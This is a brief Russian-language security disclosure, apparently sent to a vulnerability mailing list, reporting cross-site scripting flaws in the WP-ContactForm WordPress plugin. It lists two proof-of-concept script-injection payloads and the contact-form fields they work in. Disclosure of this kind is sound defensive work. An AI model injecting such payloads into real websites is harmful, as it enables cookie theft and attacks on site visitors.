Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в WP-ContactForm - плагине для WordPress. С подобными уязвимостями в данном плагине я сталкивался многократно в этом и прошлом году на различных сайтах.
XSS:
POST запрос на странице http://site/contact/:
"><script>alert(document.cookie)</script>
В полях: Ваше имя, Ваш е-mail, Ваш тел., Ваш веб-сайт.
</textarea><script>alert(document.cookie)</script>
В поле: Ваше сообщение.
Дополнительная информация о данной уязвимости у меня на сайте:
http://websecurity.com.ua/948/
О найденных уязвимостях я уже сообщил разработчику приложения.
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua